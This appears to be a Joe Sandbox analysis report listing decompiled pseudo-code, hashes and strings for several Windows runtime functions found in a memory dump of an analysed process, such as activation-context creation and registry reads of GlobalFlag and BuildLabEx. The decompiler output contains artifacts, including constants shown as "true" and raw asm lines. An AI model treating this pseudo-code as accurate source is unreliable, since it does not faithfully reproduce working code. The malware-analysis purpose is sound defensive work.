String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
API String ID: 0-3815128232
Opcode ID: f9ea56fd8378b60cb287a6789e0a3b5116b7cca4a79571f463cb4bc836325c3a
Instruction ID: 129d842de54e8c4813a5b6f2512e3ccc45b4bc7aa2a923f2a48418f18e38dc22
Opcode Fuzzy Hash: f9ea56fd8378b60cb287a6789e0a3b5116b7cca4a79571f463cb4bc836325c3a
Instruction Fuzzy Hash: EB5127BD1023508AF366CA29C86477273E6EF4538CF50488DE6E6CB285DA36D847DB71

Uniqueness

Uniqueness Score: -1.00%

Function 328C32C0 Relevance: 3.9, Strings: 3, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E328C32C0(void* __ebx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t32;
				signed int _t42;
				int _t50;
				int _t51;
				signed int _t52;
				void* _t55;
				signed int _t58;
				signed int* _t59;
				signed int _t63;
				void* _t67;
				intOrPtr* _t72;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t96;

				_t55 = __ebx;
				_t32 = _a8;
				_t72 = 0;
				if(_t32 == "Actx ") {
					L3291EF10(0x33, 0, "SXS: %s() passed the empty activation context data\n", "RtlCreateActivationContext");
					_t79 = 0xc000000d;
					L13:
					return _t79;
				}
				_t59 = _a24;
				if(_t59 != 0) {
					 *_t59 =  *_t59 & 0;
				}
				_push(_t55);
				if(_a4 != _t72 || _t32 == 0) {
					L17:
					_t79 = 0xc000000d;
					goto L18;
				} else {
					_t57 = _a12;
					if(_a12 > 0x10000 || _t59 == 0) {
						goto L17;
					} else {
						_t79 = E328C341D(_t32, _t59);
						if(_t79 < 0) {
							L12:
							goto L13;
						}
						_t72 = L328A5D90(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57 + 0x130);
						if(_t72 == 0) {
							_t79 = 0xc0000017;
							goto L12;
						}
						_t60 = _a8;
						_t58 = _t72 + 4;
						 *_t72 = 0x674d6341;
						_push("true");
						_pop(_t42);
						asm("sbb eax, eax");
						_t79 = E328C33D0(_t58 + 0x5c,  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x18)) + _t60 + 8)),  !_t42 & _t58 + 0x00000068);
						if(_t79 < 0) {
							L18:
							__eflags = _t72;
							if(_t72 != 0) {
								E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t72);
							}
							goto L12;
						}
						 *(_t58 + 4) =  *(_t58 + 4) & 0x00000000;
						 *((intOrPtr*)(_t58 + 0x10)) = _a8;
						 *((intOrPtr*)(_t58 + 0x14)) = _a16;
						_push("true");
						 *((intOrPtr*)(_t58 + 0x18)) = _a20;
						_pop(_t63);
						 *_t58 = 1;
						_t50 = memset(_t58 + 0x1c, 0, _t63 << 2);
						_push("true");
						_t51 = memset(_t58 + 0x3c, _t50, 0 << 2);
						_push("true");
						_t77 = _t58 + 0xec;
						_pop(_t67);
						_t52 = memset(_t77, _t51, 0 << 2);
						_t78 = _t77 + _t67;
						 *(_t58 + 0xe8) =  *(_t58 + 0xe8) & _t52;
						_t96 =  *0x32986911 - _t52; // 0x0
						if(_t96 != 0) {
							E3291DB2A(_t58, _t58, _t78, _t79, __eflags);
						}
						_t79 = 0;
						 *_a24 = _t58;
						goto L12;
					}
				}
			}

0x328c32c0
0x328c32c5
0x328c32ca
0x328c32d1
0x32902811
0x32902819
0x328c33c0
0x328c33c4
0x328c33c4
0x328c32d7
0x328c32dc
0x328c32de
0x328c32de
0x328c32e0
0x328c32e4
0x3290282d
0x3290282d
0x00000000
0x328c32f2
0x328c32f2
0x328c32fb
0x00000000
0x328c3309
0x328c3311
0x328c3315
0x328c33be
0x00000000
0x328c33be
0x328c3332
0x328c3336
0x32902823
0x00000000
0x32902823
0x328c333c
0x328c333f
0x328c3342
0x328c3348
0x328c3354
0x328c3357
0x328c3366
0x328c336a
0x32902832
0x32902832
0x32902834
0x32902846
0x32902846
0x00000000
0x32902834
0x328c3376
0x328c337a
0x328c3380
0x328c3386
0x328c3388
0x328c338d
0x328c338e
0x328c3394
0x328c3396
0x328c339c
0x328c339e
0x328c33a0
0x328c33a6
0x328c33a7
0x328c33a7
0x328c33a9
0x328c33af
0x328c33b5
0x328c33c9
0x328c33c9
0x328c33ba
0x328c33bc
0x00000000
0x328c33bc
0x328c32fb

Strings

SXS: %s() passed the empty activation context data, xrefs: 32902808
RtlCreateActivationContext, xrefs: 32902803
Actx , xrefs: 328C32CC

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
API String ID: 0-859632880
Opcode ID: 7168a4e6f39ec6628123607f04f299f52d76943be6a819baf5ba7d5d2d51df2c
Instruction ID: 8d065a7574f47fe1c48dc10be2dd81069466503435bae233632a62b361d29841
Opcode Fuzzy Hash: 7168a4e6f39ec6628123607f04f299f52d76943be6a819baf5ba7d5d2d51df2c
Instruction Fuzzy Hash: 6231167AA00319AFEB05CF68E8D0F9677A4EB44718F148469ED059F281CF74E846CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 3291B214 Relevance: 3.9, Strings: 3, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E3291B214(void* __ecx) {
				char _v8;
				char _v12;
				short _v14;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char* _v36;
				char _v40;
				char _v44;
				intOrPtr _v576;
				char _v580;
				intOrPtr _t44;
				intOrPtr _t46;
				intOrPtr* _t61;
				void* _t64;
				short _t65;
				void* _t66;
				intOrPtr* _t67;

				_t66 = __ecx;
				_v8 = 0;
				L328D8F40( &_v580, 0, 0x214);
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_push(0);
				_push(0x210);
				_push( &_v580);
				_push(0x2b);
				_push(_t66);
				if((E328D2B20() & 0xc0000000) == 0xc0000000) {
					L9:
					if(_v8 != 0) {
						_push(_v8);
						E328D2A80();
						_v8 = 0;
					}
					_t38 = _v12;
					if(_v12 != 0) {
						E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t38);
					}
					return _v20;
				}
				_t67 = E3291B39F(_v576);
				if(_t67 == 0) {
					goto L9;
				} else {
					_t61 = _t67;
					_t8 = _t61 + 2; // 0x2
					_t64 = _t8;
					goto L3;
					L3:
					_t44 =  *_t61;
					_t61 = _t61 + 2;
					if(_t44 != 0) {
						goto L3;
					} else {
						_t63 = _t61 - _t64 >> 1;
						_t65 = 0xc2 + (_t61 - _t64 >> 1) * 2;
						_t46 = L328A5D90(_t61 - _t64 >> 1,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t65);
						_v12 = _t46;
						if(_t46 != 0) {
							_v14 = _t65;
							if(E3289FE40(_t63,  &_v16, L"\\Registry\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\") >= 0 && E3289FE40(_t63,  &_v16, _t67) >= 0) {
								_v44 = 0x18;
								_v36 =  &_v16;
								_push( &_v44);
								_push(1);
								_v40 = 0;
								_push( &_v8);
								_v32 = 0x40;
								_v28 = 0;
								_v24 = 0;
								if(E328D2AB0() >= 0) {
									L32886CC0(_v8, L"GlobalFlag", "true",  &_v20, "true", 0);
								}
							}
						}
						goto L9;
					}
				}
			}

0x3291b231
0x3291b233
0x3291b236
0x3291b23e
0x3291b247
0x3291b24a
0x3291b24d
0x3291b24e
0x3291b253
0x3291b254
0x3291b256
0x3291b265
0x3291b31c
0x3291b31f
0x3291b321
0x3291b324
0x3291b329
0x3291b329
0x3291b32c
0x3291b331
0x3291b33e
0x3291b33e
0x3291b34a
0x3291b34a
0x3291b276
0x3291b27a
0x00000000
0x3291b280
0x3291b280
0x3291b282
0x3291b282
0x3291b282
0x3291b285
0x3291b285
0x3291b288
0x3291b28e
0x00000000
0x3291b290
0x3291b298
0x3291b29a
0x3291b2a6
0x3291b2ab
0x3291b2b0
0x3291b2ba
0x3291b2c6
0x3291b2d9
0x3291b2e0
0x3291b2e6
0x3291b2e7
0x3291b2ec
0x3291b2ef
0x3291b2f0
0x3291b2f7
0x3291b2fa
0x3291b304
0x3291b317
0x3291b317
0x3291b304
0x3291b2c6
0x00000000
0x3291b2b0
0x3291b28e

Strings

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3291B2B2
@, xrefs: 3291B2F0
GlobalFlag, xrefs: 3291B30F

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
API String ID: 0-4192008846
Opcode ID: de7f877a4a12801930ab8add6a2f6ed4800568ead799ba11596af051ca6d7dff
Instruction ID: 134b82329bef398e76253f8db5b90435b7d2462cc09e1f10c7b547d8966c182a
Opcode Fuzzy Hash: de7f877a4a12801930ab8add6a2f6ed4800568ead799ba11596af051ca6d7dff
Instruction Fuzzy Hash: 21316DB5D0120DAEEB00DF99DC90BEEBBBDEF04344F400469E615AB241DB74AE058B90

Uniqueness

Uniqueness Score: -1.00%

Function 328D1190 Relevance: 3.8, Strings: 3, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E328D1190(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				char _v12;
				char _v20;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				char _v52;
				signed int _t38;
				signed int _t39;
				void* _t55;
				void* _t61;
				void* _t62;
				signed int _t63;
				void* _t65;
				signed int _t70;

				_t55 = __edx;
				E328D5050(__ecx,  &_v20, __ecx);
				_v52 = 0x18;
				_v44 =  &_v20;
				_v48 = 0;
				_push( &_v52);
				_push(0x20019);
				_v40 = 0x40;
				_push( &_v12);
				_v36 = 0;
				_v32 = 0;
				_t62 = E328D2AB0();
				if(_t62 < 0) {
					L9:
					return _t62;
				}
				_t38 = _a8;
				_t63 = 2;
				_t39 = _t38 * _t63;
				_t70 = _t38 * _t63 >> 0x20;
				if(_t70 < 0 || _t70 <= 0 && _t39 <= 0xffffffff) {
					_v8 = _t39;
					_push( &_v8);
					_push("true");
					_pop(_t61);
					_t58 = _t39;
					if(E328C457E(_t39, _t61) < 0) {
						goto L13;
					}
					_t65 = L328A5D90(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), "true", _v8);
					if(_t65 == 0) {
						_t62 = 0xc0000017;
					} else {
						E328D5050(_t58,  &_v28, _t55);
						_push( &_a8);
						_push(_v8);
						_push(_t65);
						_push(_t63);
						_push( &_v28);
						_push(_v12);
						_t62 = E328D2B00();
						if(_t62 >= 0) {
							E328D88C0(_a4, _t65 + 0xc,  *((intOrPtr*)(_t65 + 8)));
						}
						E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t65);
					}
					_push(_v12);
					E328D2A80();
					goto L9;
				} else {
					L13:
					_push(_v12);
					E328D2A80();
					return 0xc0000095;
				}
			}

0x328d119f
0x328d11a2
0x328d11aa
0x328d11b1
0x328d11b9
0x328d11bc
0x328d11bd
0x328d11c5
0x328d11cc
0x328d11cd
0x328d11d0
0x328d11d8
0x328d11dc
0x328d126d
0x00000000
0x328d126d
0x328d11e2
0x328d11e7
0x328d11e8
0x328d11ea
0x328d11ec
0x328d1200
0x328d1203
0x328d1204
0x328d1206
0x328d1207
0x328d1210
0x00000000
0x00000000
0x328d1229
0x328d122d
0x328d128a
0x328d122f
0x328d1234
0x328d123c
0x328d123d
0x328d1243
0x328d1244
0x328d1245
0x328d1246
0x328d124e
0x328d1252
0x328d1280
0x328d1285
0x328d1260
0x328d1260
0x328d1265
0x328d1268
0x00000000
0x32909a99
0x32909a99
0x32909a99
0x32909a9c
0x00000000
0x32909aa1

Strings

@, xrefs: 328D11C5
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 328D119B
BuildLabEx, xrefs: 328D122F

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 0-3051831665
Opcode ID: 760b537d3be61d34daff739933b3035096550dba3921f427743609871724948b
Instruction ID: 2bf9cda5e69a3afdc3bd0419c689c34fd6e70dbebead61ce993a562f416de394
Opcode Fuzzy Hash: 760b537d3be61d34daff739933b3035096550dba3921f427743609871724948b
Instruction Fuzzy Hash: 0B31707A900619BBEB11DB99CC40FEFBBBDEF84B54F004025E514A7260DB71DA09CB90

Uniqueness

Uniqueness Score: -1.00%

Function 32897623 Relevance: 3.2, APIs: 2, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E32897623(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char* _t69;
				intOrPtr _t71;
				intOrPtr _t74;
				intOrPtr _t75;
				signed int _t81;
				signed int _t82;
				signed int _t89;
				signed int _t90;
				void* _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				intOrPtr _t113;
				intOrPtr _t119;
				intOrPtr _t120;
				intOrPtr _t130;
				intOrPtr _t132;
				signed int _t133;
				signed int _t135;
				intOrPtr _t138;
				intOrPtr _t141;
				intOrPtr _t142;
				intOrPtr _t143;
				intOrPtr _t144;
				intOrPtr _t145;
				intOrPtr _t146;
				void* _t160;

				_t145 = __edx;
				_t138 = __ecx;
				_v32 = __edx;
				_v28 = __ecx;
				if(L328A3C40() != 0) {
					_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				} else {
					_t69 = 0x7ffe0386;
				}
				if( *_t69 != 0) {
					L32964F7C(((0 | _a4 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + _t145, _t138);
				}
				goto L3;
				do {
					do {
						L3:
						_t71 =  *0x329867f0; // 0x0
						_t130 =  *0x329867f4; // 0x0
						_v20 = _t71;
						_v8 = _t130;
						_v16 =  *0x7FFE03B4;
						_v12 =  *0x7ffe03b0;
						while(1) {
							_t146 =  *0x7ffe000c;
							_t99 =  *0x7FFE0008;
							if(_t146 ==  *0x7FFE0010) {
								goto L5;
							}
							asm("pause");
						}
						L5:
						_t132 = _v8;
						_t141 = _v16;
						_t74 =  *0x7ffe03b0;
						_t113 =  *((intOrPtr*)(0x7ffe03b4));
						_v24 = _t74;
					} while (_v12 != _t74 || _t141 != _t113);
					_t75 =  *0x329867f0; // 0x0
					_t142 =  *0x329867f4; // 0x0
					_v16 = _t142;
					_t143 = _v20;
				} while (_t143 != _t75 || _t132 != _v16);
				asm("sbb esi, ecx");
				_t101 = _t99 - _v24 - _t143;
				_t144 = _v28;
				asm("sbb esi, edx");
				L328A2330(_t144 + 0x90, _t144 + 0x90);
				 *(_t144 + 0xde) = 0;
				if(( *(_t144 + 0xde) & 0x00000004) != 0) {
					 *(_t144 + 0xd8) = 0;
					 *((intOrPtr*)(_t144 + 0xc8)) = 0;
					 *((intOrPtr*)(_t144 + 0xcc)) = 0;
					 *((intOrPtr*)(_t144 + 0xd0)) = 0;
					E328A24D0(_t144 + 0x90);
					_t81 = E329649D2( *((intOrPtr*)(_t144 + 0xd0)));
					L20:
					_t82 = _t81 | 0xffffffff;
					asm("lock xadd [edi], eax");
					if(_t82 == 0) {
						 *0x329891e0(_t144);
						return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t144 + 4))))))();
					}
					return _t82;
				}
				if( *((intOrPtr*)(_t144 + 0xdd)) != 0) {
					 *((intOrPtr*)(_t144 + 0xc8)) = 0;
					 *((intOrPtr*)(_t144 + 0xcc)) = 0;
					if(L328CCC67() != 0) {
						goto L18;
					}
					goto L19;
				} else {
					_t133 =  *(_t144 + 0xd8);
					if(_t133 != 0) {
						if(_a4 != 0) {
							_t119 = _t101;
							_v8 = _t146;
						} else {
							_t119 =  *((intOrPtr*)(_t144 + 0xc8));
							_v8 =  *((intOrPtr*)(_t144 + 0xcc));
						}
						_t89 = _t133;
						_t135 = _t89 * 0x2710 >> 0x20;
						_t90 = _t89 * 0x2710;
						_t120 = _t119 + _t90;
						_v12 = _t90;
						_t91 = _v8;
						asm("adc eax, edx");
						_v24 = 0x2710;
						_v28 = _t120;
						_v8 = _t91;
						 *((intOrPtr*)(_t144 + 0xc8)) = _t120;
						 *((intOrPtr*)(_t144 + 0xcc)) = _t91;
						_t160 = _t91 - _t146;
						if(_t160 <= 0 && (_t160 < 0 || _t120 <= _t101)) {
							asm("sbb eax, [ebp-0x4]");
							_t97 = E328D6540(_t101 - _v28, _t146, _v12, _t135);
							_t91 = _v24;
							asm("sbb eax, edx");
							 *((intOrPtr*)(_t144 + 0xc8)) = _v12 - _t97 + _t101;
							asm("adc eax, esi");
							 *((intOrPtr*)(_t144 + 0xcc)) = _v24;
						}
						asm("lock inc dword [edi]");
						_t102 = _v32;
						L328A2330(_t91, _v32);
						E328979D1(_v32 + 0x50, _t144);
						E328977F9(_t102 + 0x50, 0);
						E328A24D0(_t102);
					}
					L18:
					E328A1BE7(_t144);
					L19:
					_t81 = E328A24D0(_t144 + 0x90);
					goto L20;
				}
			}

0x3289762e
0x32897630
0x32897632
0x32897635
0x3289763f
0x328f171a
0x32897645
0x32897645
0x32897645
0x3289764d
0x328f1737
0x328f1737
0x00000000
0x32897653
0x32897653
0x32897653
0x32897653
0x3289765d
0x32897663
0x32897666
0x32897673
0x32897676
0x3289767f
0x3289767f
0x32897681
0x32897687
0x00000000
0x00000000
0x328977f2
0x328977f2
0x3289768d
0x3289768d
0x32897695
0x32897698
0x3289769a
0x3289769d
0x328976a0
0x328976a9
0x328976ae
0x328976b4
0x328976b7
0x328976ba
0x328976c6
0x328976c8
0x328976ca
0x328976cd
0x328976d6
0x328976e3
0x328976eb
0x328f174e
0x328f1754
0x328f175a
0x328f1760
0x328f1766
0x328f176d
0x3289778a
0x3289778a
0x3289778d
0x32897791
0x328f177f
0x00000000
0x328f1785
0x3289779b
0x3289779b
0x328976f7
0x328977cf
0x328977d5
0x328977e4
0x00000000
0x00000000
0x00000000
0x328976fd
0x328976fd
0x32897705
0x3289770a
0x328977e8
0x328977ea
0x32897710
0x32897716
0x3289771c
0x3289771c
0x3289771f
0x32897726
0x32897726
0x32897728
0x3289772a
0x3289772d
0x32897730
0x32897732
0x32897735
0x32897738
0x3289773b
0x32897741
0x32897747
0x32897749
0x328977a9
0x328977ae
0x328977b8
0x328977bb
0x328977bf
0x328977c5
0x328977c7
0x328977c7
0x32897751
0x32897754
0x32897758
0x32897762
0x3289776c
0x32897772
0x32897772
0x32897777
0x32897779
0x3289777e
0x32897785
0x00000000
0x32897785

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 078c7aeb611d473d73bcc0cb5bc9a32d48c26140d3d526896c0f1bdcda2ac9e7
Instruction ID: 2efbb67922df6a3f6520ec24052137deb5ae17a20aea3eac7b46861f32f86369
Opcode Fuzzy Hash: 078c7aeb611d473d73bcc0cb5bc9a32d48c26140d3d526896c0f1bdcda2ac9e7
Instruction Fuzzy Hash: CB6152B9A01606AFDB08CF6CC880B9DFBB5BF48744F24826AD41DA7351DB71A951CB90

Uniqueness

Uniqueness Score: -1.00%

Function 328A51C0 Relevance: 3.2, Strings: 2, Instructions: 658
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E328A51C0(signed int _a4, signed short _a8, signed int _a12, signed short _a16, intOrPtr _a20, intOrPtr* _a24, signed short _a28, signed int _a32, signed int* _a36) {
				signed int _v8;
				char _v532;
				void* _v568;
				signed int _v616;
				intOrPtr _v632;
				signed int _v660;
				void* _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				signed int _v676;
				void* _v680;
				signed int _v692;
				signed int _v696;
				signed short _v700;
				signed int _v704;
				intOrPtr _v708;
				signed int _v712;
				signed short _v716;
				signed int _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed short _v744;
				void* _v748;
				signed int _v752;
				signed short _v756;
				signed short _v760;
				signed int _v764;
				void* _v768;
				void* _v772;
				void* _v776;
				void* _v780;
				void* _v782;
				void* _v784;
				void* _v788;
				void* _v792;
				void* _v796;
				void* _v798;
				void* _v800;
				void* _v802;
				void* _v804;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t223;
				signed short _t224;
				signed short* _t226;
				signed short _t229;
				unsigned int _t233;
				signed int _t237;
				signed int _t240;
				signed short _t244;
				signed short _t250;
				signed short _t255;
				signed short _t257;
				signed short _t261;
				signed short _t270;
				signed int _t271;
				signed short _t272;
				signed int _t273;
				unsigned int _t274;
				signed short* _t276;
				signed int _t280;
				unsigned int _t281;
				signed int _t299;
				intOrPtr _t301;
				void* _t305;
				signed short* _t313;
				signed int _t315;
				intOrPtr _t317;
				intOrPtr _t322;
				signed int _t330;
				intOrPtr* _t332;
				void* _t333;
				intOrPtr _t336;
				signed int _t337;
				intOrPtr _t338;
				signed short* _t339;
				signed short _t340;
				signed int _t343;
				signed short _t344;
				signed short _t346;
				short* _t347;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t367;
				signed short _t369;
				signed int _t370;
				signed int _t372;
				signed short _t376;
				signed short _t377;
				signed int _t386;
				signed int _t396;
				signed short* _t398;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t408;
				signed int _t410;
				void* _t411;
				signed int _t412;
				intOrPtr _t413;
				signed short _t418;
				void* _t420;
				signed short _t421;
				signed short _t422;
				short* _t423;
				intOrPtr _t424;
				void* _t425;
				void* _t426;
				signed int _t427;
				signed int _t429;

				_t429 = (_t427 & 0xfffffff8) - 0x2fc;
				_v8 =  *0x3298b370 ^ _t429;
				_t340 = _a8;
				_t389 = _a32;
				_t332 = _a24;
				_v756 = _a16;
				_v728 = _a20;
				_t223 = _a28;
				_v736 = _a36;
				_v744 = _t340;
				_v748 = _t332;
				_v716 = _t223;
				_v720 = _t389;
				_v740 = 0;
				_v732 = 0;
				_v764 = 0x2080000;
				_v760 =  &_v532;
				_t410 = _a12;
				_v712 = _t410;
				if(_t223 != 0) {
					 *_t223 = 0;
				}
				_t418 = _v756;
				if(_v736 != 0) {
					 *_v736 = 0;
					_t418 = _v756;
				}
				if(_t389 != 0) {
					 *_t389 = 0;
				}
				if(_t332 != 0) {
					_t389 = 0;
					 *_t332 = 0;
					 *((intOrPtr*)(_t332 + 4)) = 0;
				}
				if((_a4 & 0xfffffff8) != 0 || _t340 == 0 || _t410 == 0 || _v728 != 0 && _t332 != 0 && _t223 == 0) {
					_t224 = 0xc000000d;
					goto L48;
				} else {
					_t343 =  *_t410 & 0x0000ffff;
					_t226 =  *(_t410 + 4);
					if(_t343 < 2) {
						L15:
						if(_t343 < 4 ||  *_t226 == 0 || _t226[1] != 0x3a) {
							_t389 = 5;
						} else {
							if(_t343 < 6) {
								L127:
								_t389 = 3;
								L21:
								_v724 = _t389;
								if((_a4 & 0x00000002) == 0) {
									__eflags = _t389 - 5;
									if(_t389 == 5) {
										L53:
										__eflags = _a4 & 0x00000001;
										if((_a4 & 0x00000001) != 0) {
											_v696 = 0;
											_t421 = E328A9870(1, _t410, _t418, _v728, _t332,  &_v696, 0, _v720, _v736);
											__eflags = _t421;
											if(_t421 >= 0) {
												_t344 = _v716;
												__eflags = _t344;
												if(_t344 != 0) {
													 *_t344 = _v696;
												}
												L50:
												_t421 = 0;
												L45:
												_t229 = _v760;
												if(_t229 != 0 && _t229 !=  &_v532) {
													E328A3B90( &_v764);
												}
												_t224 = _t421;
												L48:
												_pop(_t411);
												_pop(_t420);
												_pop(_t333);
												return E328D4B50(_t224, _t333, _v8 ^ _t429, _t389, _t411, _t420);
											}
											__eflags = _t421 - 0xc0150008;
											if(_t421 != 0xc0150008) {
												goto L45;
											}
											_t418 = _v756;
										}
										__eflags = _t418;
										if(_t418 == 0) {
											L64:
											_t346 = _v744;
											_t233 =  *_t346 & 0x0000ffff;
											_t422 = _t233;
											_v704 = _t422;
											__eflags = _t233;
											if(_t233 == 0) {
												L77:
												_t389 = _v732 & 0x0000ffff;
												_v752 = _t389;
												_t237 = ( *_t410 & 0x0000ffff) + _t389 + _v740 + 2;
												_t336 = _v748;
												_v704 = _t237;
												__eflags = _t237 - 0xfffe;
												if(_t237 > 0xfffe) {
													_t421 = 0xc0000106;
													goto L45;
												}
												_t347 =  *((intOrPtr*)(_t346 + 4));
												_v748 = _t347;
												_t240 = _t347 + ((_t422 & 0x0000ffff) >> 1) * 2;
												_v712 = _t240;
												__eflags = _t347 - _t240;
												if(_t347 >= _t240) {
													L44:
													_t421 = 0xc000000f;
													goto L45;
												} else {
													goto L79;
												}
												while(1) {
													L79:
													_t423 = _t347;
													__eflags = _t347 - _t240;
													if(_t347 == _t240) {
														goto L82;
													} else {
														goto L80;
													}
													while(1) {
														L80:
														__eflags =  *_t423 - 0x3b;
														if( *_t423 == 0x3b) {
															goto L82;
														}
														_t423 = _t423 + 2;
														__eflags = _t423 - _t240;
														if(_t423 != _t240) {
															continue;
														}
														goto L82;
													}
													L82:
													_t244 = _t423 - _t347 & 0xfffe;
													_v744 = _t244;
													_v732 = _t244 & 0x0000ffff;
													__eflags = _t244;
													if(_t244 != 0) {
														_t360 =  *(_t423 - 2) & 0x0000ffff;
														__eflags = _t360 - 0x5c;
														if(_t360 != 0x5c) {
															__eflags = _t360 - 0x2f;
															if(_t360 != 0x2f) {
																_t244 = _t244 + 2;
																__eflags = _t244;
																_v744 = _t244;
															}
														}
													}
													_t389 = _t389 + ( *_t410 & 0x0000ffff) + (_t244 & 0x0000ffff);
													__eflags = ( *(_t429 + 0x12) & 0x0000ffff) - _t389 + 2;
													if(( *(_t429 + 0x12) & 0x0000ffff) < _t389 + 2) {
														__eflags = _v760 -  &_v532;
														if(_v760 !=  &_v532) {
															goto L163;
														}
														__eflags = _t389 - 0xfffc;
														if(_t389 > 0xfffc) {
															goto L163;
														}
														 *((short*)(_t429 + 0x16)) = _v704 & 0x0000ffff;
														_t250 = L328A5D60(_v704 & 0x0000ffff);
														_v764 = _t250;
														__eflags = _t250;
														if(_t250 == 0) {
															L149:
															_t224 = 0xc0000017;
															goto L48;
														}
														goto L87;
													} else {
														L87:
														_v764 = 0;
														L328BDCDF( &_v764, _v748, _v732 & 0x0000ffff);
														_t255 = _v748;
														__eflags = _t255;
														if(_t255 != 0) {
															__eflags = _v732 - _t255;
															if(_v732 != _t255) {
																 *((short*)(_v760 + ((_v764 & 0x0000ffff) >> 1) * 2)) = 0x5c;
																_t144 =  &_v764;
																 *_t144 = _v764 + 2;
																__eflags =  *_t144;
															}
														}
														L328BDD46( &_v764, _t410);
														_t257 = _v756;
														__eflags = _t257;
														if(_t257 != 0) {
															L328BDD46( &_v764, _t257);
														}
														_t389 = _v764 & 0x0000ffff;
														__eflags = _t389 + 2 - ( *(_t429 + 0x12) & 0x0000ffff);
														if(__eflags > 0) {
															L163:
															_t421 = 0xc00000e5;
															goto L45;
														} else {
															 *((short*)(_v760 + (_t389 >> 1) * 2)) = 0;
															_t389 = 0;
															_t261 = L328C31BE( &_v764, 0, __eflags);
															__eflags = _t261;
															if(_t261 != 0) {
																_push(_v736);
																_push( &_v724);
																_push(0);
																_push(_v720);
																_push(_v716);
																_push(_t336);
																L106:
																_push(_v728);
																_push( &_v764);
																_t421 = E328A9690();
																__eflags = _t421;
																if(_t421 >= 0) {
																	_t421 = 0;
																}
																goto L45;
															}
															_t240 = _v712;
															__eflags = _t423 - _t240;
															if(_t423 == _t240) {
																_t347 = _t423;
																_v748 = _t423;
															} else {
																_t156 = _t423 + 2; // 0x3a
																_t347 = _t156;
																_v748 = _t347;
															}
															__eflags = _t347 - _t240;
															if(_t347 >= _t240) {
																goto L44;
															} else {
																_t389 = _v752;
																continue;
															}
